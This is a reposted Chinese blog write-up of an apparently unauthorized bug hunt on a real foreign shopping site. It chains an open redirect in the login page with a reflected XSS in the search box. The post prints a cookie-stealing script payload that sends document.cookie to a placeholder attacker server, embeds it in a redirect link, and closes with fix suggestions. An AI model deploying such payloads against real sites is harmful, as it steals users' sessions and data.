记一次真实对国外某购物平台web漏洞挖掘

admin 2023年3月5日13:29:01评论42 views字数 2251阅读7分30秒阅读模式
(真实世界)我的第一次真实对国外某购物平台web漏洞挖掘
  • 开放重定向 - 低危

  • XSS - 低危

这两组合起来就完全不一样一点的,个人觉得比原本高一些

危害:窃取用户敏感数据、用户cookie、钓鱼操作 等…

前言

这是我第一次,真实世界的web漏洞挖掘(开发重定向 + xss)

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

虽然这两个漏洞都比较简单,但这是我第一次的真实漏洞挖掘,当然要记录一下,哪怕再简单

这次漏洞挖掘是无意的,这是我在做题的时候,题目需要我进行信息收集,我收集到相关的一个网站,于是在这个网站多看了几眼,发现了漏洞

首先我打开这个网站的第一件事,也是最简单的:查看源代码

记一次真实对国外某购物平台web漏洞挖掘

源代码:

记一次真实对国外某购物平台web漏洞挖掘

在源代码中发现这一个url

url参数重定向 - OpenRedirect

分析:

/sign-in?redirect=

这里我测试过,因为这里是用户登录页面

  • 如果用户未登录,则在用户登录成功后,重定向到redirect参数指定的url

  • 如果用户已登录,则直接跳转到redirect参数指定的url

当我尝试修改redirect参数,改成百度:

记一次真实对国外某购物平台web漏洞挖掘

在已登录状态下,确实重定向到百度去了

open redirect的好兄弟

我们都知道,单单一个开放重定向通常情况下危害不大,甚至可以忽略不计,没啥用

但是可以搭配其他漏洞来做一套组合拳,这个漏洞就是xss.

通过开放重定向漏洞将受害者重定向到被攻击者控制的具有xss漏洞的页面上,执行恶意js代码

通过这套开放重定向 + xss

攻击者很容易获得一些信息,如:

  • 用户的cookie

  • 攻击者期望的操作,例如:下单、修改账户等相关操作

  • 社会工程 - 攻击者利用xss构建恶意代码,攻击者诱导受害者填写隐私信息以获取攻击者想要获取的受害者的信息

等等等等

所以现在我们的当务之急应该寻找xss漏洞,打一套组合拳

XSS - 反射型

果不其然,经过tryhackme的训练,我一下子就找到了

就在网站主页的搜索功能!

一开始尝试sql注入,但是无果

但是第二次尝试寻找漏洞的时候,我发现输入的内容会拼接到回显页面中,于是开始尝试xss

记一次真实对国外某购物平台web漏洞挖掘

它直接镶嵌到span标签中

我直接绕出去了,毫无难度,成功找到反射xss漏洞

XSS + OpenRedirect - 组合拳

兔年万事如意,心想事成

现在我们可以尝试简单的利用xss+开放重定向获取用户的cookie

构造XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

注意:这里的fetch函数中的url不能携带有http://或https://,否则会失败,所以使用//

最好不要有空格,因为此payload稍后将会放到url参数中

我们可以直接验证此payload是否有效:

记一次真实对国外某购物平台web漏洞挖掘

可以看到它携带着cookie去请求攻击者托管的http服务器去了!

记一次真实对国外某购物平台web漏洞挖掘

现在让我们将xss和开放重定向组合起来:

实现让用户点击我们的精心设计过的登录url,即可窃取该用户的cookie等

如果通过钓鱼等方式令网站管理员点击此恶意链接会发生什么事?

我很难想象,毕竟这个平台有些地方甚至没有csrf防护,也别忘了我们还有xss

回归正题

首先,随便注册个账户并登录

记一次真实对国外某购物平台web漏洞挖掘

XSS Payload:

https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

OpenRedirect Payload:

https://www.nonno.co.uk/sign-in?redirect=https://www.nonono.co.uk/search?nonono='<script>fetch('//<攻击者http服务器>/?cookie='+btoa(document.cookie));</script>

解析:当已登录用户点击此OpenRedirect payload的url,将重定向到xss漏洞处并执行我们指定的恶意js代码,这里的js代码使用fetch发送请求到我们攻击者的http服务器并附带cookie

记一次真实对国外某购物平台web漏洞挖掘

至此漏洞利用完成,攻击者将获取受害者的cookie,甚至其他任何操作!

只要适当的将payload进行urlencode,受害者可能根本无法判断!

更进一步的利用:OpenRedirect + XSS,再加csrf等等等等,危害还能在提升

漏洞修补建议

OpenRedirect

  • 不要使用url参数(GET or POST)来进行重定向,即便使用,也要做好防护,避免idor

  • 完善各个功能的csrf防护

XSS

  • 做好用户输入检测,检测到黑名单字符直接禁止访问

  • 过滤特殊字符

结束

事实上我这里只找了两个漏洞,很难猜测其他地方是否还存在其他漏洞。

希望平台管理方认真做好安全防护

这也是我的第一次真实的web漏洞挖掘,我非常的激动,这是一次无意的漏洞挖掘,真的是无意的

不说了,跑路了

————————————————

作者:Sugobet
原文链接:https://blog.csdn.net/qq_54704239/article/details/128754634

原文始发于微信公众号(菜鸟学安全):记一次真实对国外某购物平台web漏洞挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月5日13:29:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次真实对国外某购物平台web漏洞挖掘http://cn-sec.com/archives/1587994.html

发表评论

匿名网友 填写信息